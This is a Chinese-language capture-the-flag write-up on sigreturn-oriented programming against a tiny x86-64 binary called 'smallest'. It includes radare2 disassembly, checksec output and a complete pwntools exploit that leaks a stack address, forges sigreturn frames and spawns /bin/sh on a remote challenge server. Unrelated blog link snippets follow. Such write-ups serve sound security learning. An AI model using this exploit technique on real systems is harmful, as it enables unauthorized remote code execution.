以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15

Warning: Cannot initialize dynamic strings

[x] Analyze all flags starting with sym. and entry0 (aa)

[x] Analyze len bytes of instructions for references (aar)

[x] Analyze function calls (aac)

[ ] [*] Use -AA or aaaa to perform additional experimental analysis.

[x] Constructing a function name for fcn.* and sym.func.* functions (aan))

0x004000b0

 -- WASTED

[0x004000b0]> afl

0x004000b0    1 17           entry0

[0x004000b0]> pdf entry0

            ;-- section..text:

/ (fcn) entry0 17

|   entry0 ();

|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text

|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024

|           0x004000b8      4889e6         mov rsi, rsp

|           0x004000bb      4889c7         mov rdi, rax

|           0x004000be      0f05           syscall

\           0x004000c0      c3             ret

[0x004000b0]>

源码就这么几行,

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06

smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12

[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'

    Arch:     amd64-64-little

    RELRO:    No RELRO

    Stack:    No canary found

    NX:       NX enabled

    PIE:      No PIE (0x400000)

junmoxiao@cat ~/s/pd_ubuntu>

最后的exp

#coding:utf-8

from pwn import *

import time

file_name = './smallest'

context.binary = file_name

elf = ELF(file_name)

#context.log_level = 'debug'

syscall_addr = 0x4000be

#p = process(file_name)

p = remote('106.75.93.227', 20000)

#p = remote('106.75.61.55',  20000)

#gdb.attach(p, 'aslr on;b * 0x4000b0')

# ---------------------------------------------------------------------------------

log.info('call read; call write; call read')

payload = p64(0x4000b0)

payload += p64(0x4000b3)

payload += p64(0x4000b0)

p.sendline(payload)

time.sleep(3)

p.send('\xb3')

# -------------------------------------------------------------------------------------

# set eax; sigreturn;

leak_data = p.recvn(0x400)

leak_addr = u64(leak_data[0x8:0x8+8])

print "leak_addr: %s" % hex(leak_addr)

stack_addr = leak_addr - 0x1000

print 'stack_start_addr %s' % hex(stack_addr)

binsh_addr = stack_addr + 0x300

print 'binsh_addr: %s' % hex(binsh_addr)

log.info('stack pivot to %s' % hex(stack_addr))

frame = SigreturnFrame()

frame.rax = constants.SYS_read

frame.rdi = 0

frame.rsi = stack_addr

frame.rdx = 0x500

frame.rsp = stack_addr

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

p.sendline(payload)

time.sleep(10)

p.send(payload[8:8+15]) # set eax=sigreturn

time.sleep(5)

log.info('execve')

frame = SigreturnFrame()

frame.rax = constants.SYS_execve

frame.rdi = binsh_addr

frame.rsi = 0

frame.rdx = 0

frame.rsp = 0x400300

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00'

p.sendline(payload)

time.sleep(5)

p.send(payload[8:8+15]) # set eax=sigreturn

p.interactive()

SROP的一个实例的更多相关文章

  1. C#[Win32&WinCE&WM]应用程序只能运行一个实例:MutexHelper

    前言 在开发应用程序时,通常只让程序运行一个实例.所以,就要判断程序是否已经运行. 下面是我自己在项目中使用到,封装好的帮助类.有 普通的 C# 应用程序 和 Windows CE 和 Windows ...

  2. 转 C# 只允许运行一个实例

    来源:http://blog.csdn.net/jin20000/article/details/3136791 互斥进程(程序), 简单点说,就是在系统中只能有该程序的一个实例运行. 现在很多软件都 ...

  3. C# 只启动一个实例完全解决方案

    工作上经常会遇到"程序只能启动一个实例"这样的需求. 我想,这样的需求应该很普遍,所以没打算去动脑筋,去找谷歌问下就得了,用下来发现,不是这里不爽就是那里不行. 先说下我详细的几点 ...

  4. ArcGIS API for JavaScript开发环境搭建及第一个实例demo

    原文:ArcGIS API for JavaScript开发环境搭建及第一个实例demo ESRI公司截止到目前已经发布了最新的ArcGIS Server for JavaScript API v3. ...

  5. Sqlserver Sql Agent Job 只能同时有一个实例运行

    Sqlserver Sql Agent中的Job默认情况下只能有一个实例在运行,也就是说假如你的Sql Agent里面有一个正在运行的Job叫"Test Job",如果你现在再去启 ...

  6. c# 只允许一个实例运行

    1.单件模式,Singleton,应用程序只能允许一个实例在运行.这是最好的解决方法2.查询系统进程里是不是已经运行.private void Form1_Load(object sender, Ev ...

  7. Python使用MySQL数据库的方法以及一个实例

    使用环境:Windows+python3.4+MySQL5.5+Navicat 一.创建连接 1.准备工作,想要使用Python操作MySQL,首先需要安装MySQL-Python的包,在Python ...

  8. Linux编程之《只运行一个实例》

    概述 有些时候,我们要求一个程序在系统中只能启动一个实例.比如,Windows自带的播放软件Windows Medea Player在Windows里就只能启动一个实例.原因很简单,如果同时启动几个实 ...

  9. Qt之运行一个实例进程

    简述 发布程序的时候,我们往往会遇到这种情况: 只需要用户运行一个实例进程 用户可以同时运行多个实例进程 一个实例进程的软件有很多,例如:360.酷狗- 多个实例进程的软件也很多,例如:Visual ...

随机推荐

  1. css 精灵图的使用

    精灵图的使用 1.给一个容器定义一个大小(宽高) 2.引入背景图 3.定位到自己你想要的图片位置 例如:  background-position: 0 0;  background-position ...

  2. [LeetCode] 704. Binary Search

    Description Given a sorted (in ascending order) integer array nums of n elements and a target value, ...

  3. MongoDB 学习笔记之 分片和副本集混合运用

     分片和副本集混合运用: 基本架构图: 搭建详细配置: 3个shard + 3个replicat set + 3个configserver + 3个Mongos shardrsname Primary ...

  4. Flutter 的基本控件

    文本控件 Text 支持两种类型的文本展示,一个是默认的展示单一样式文本 Text,另一个是支持多种混合样式的富文本 Text.rich. 单一样式文本 Text 单一样式文本 Text 的初始化,是 ...

  5. C#学习--SQL server数据库基本操作(连接、增、删、改、查)封装

    写在前面: 在日常的工作中,通常一个项目会大量用的数据库的各种基本操作,因此小编几个常见的数据库的操作封装成了一个dll方便后续的开发使用.SQLserver数据库是最为常见的一种数据库,本文则主要是 ...

  6. Spring源码分析之IOC的三种常见用法及源码实现(一)

    1.ioc核心功能bean的配置与获取api 有以下四种 (来自精通spring4.x的p175) 常用的是前三种 第一种方式 <?xml version="1.0" enc ...

  7. Vue部分编译不生效,解决Vue渲染时候会闪一下

    0828自我总结 Vue部分编译不生效,解决Vue渲染时候会闪一下 一.Vue编译不生效 在标签里添加v-pre <script src="vue.js"></s ...

  8. ‎Cocos2d-x 学习笔记(11.10) Spawn

    Spawn让多个action同时执行. Spawn有多种不同的create方法,最终都调用了createWithTwoActions(FiniteTimeAction *action1, Finite ...

  9. 问题:LinkedList 是原始类型。应该将对通用类型 LinkedList<E> 的引用参数化

    jdk1.5之后,引入了泛型,类似下面这种写法会出现类似警告,可以忽略,  LinkedList llist = new LinkedList();也可以修改一下,指定类型  LinkedList&l ...

  10. 电脑扫描不出u盘的解决办法

    现象:u盘已插上但是设备和驱动器里却找不到 解决办法: 首先记下u盘名称,然后 我的电脑-右键-管理-设备管理器,找到u盘,卸载设备后重新插入u盘即可